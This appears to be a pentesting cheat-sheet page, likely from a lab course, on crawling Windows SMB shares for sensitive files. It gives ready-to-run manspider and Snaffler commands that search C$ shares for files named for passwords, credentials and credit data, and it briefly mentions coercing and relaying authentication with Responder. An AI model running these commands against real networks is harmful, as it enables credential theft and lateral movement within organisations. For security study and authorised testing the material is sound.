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Very useful tool to crawl shares on the domain and find juicy information.

manspider ../smb_hosts.txt \
          --exclude-sharenames 'IPC$' 'ADMIN$' 'PRINT$' \ 
          --sharenames 'C$' \
          --maxdepth 5 \
          --exclude-dirnames 'AppData' 'Downloads' \ 
          --dirnames 'Desktop' 'Users' \
          -f 'passw' 'login' 'credenti' 'creds' 'password' 'credit' \ 
          -e doc txt xls docx xlsx \
          -u 'USER' \
          -p 'REDACTED' | tee /home/aghebert\


Another tool to crawl Windows shares and find juicy information our user has access too.

This tools needs to be run from a domain-joined Windows system host or a domain user context.

-d: Specify the domain to look within.

-s: print the result on the console.

-v: verbosity (data is specified to only output the result).

.\Snaffler.exe  -d INLANEFREIGHT.LOCAL -s -v data


Coerce a Windows system to authenticate to our attacker machine. We can also use Responder ( to relay the authentication.

Last updated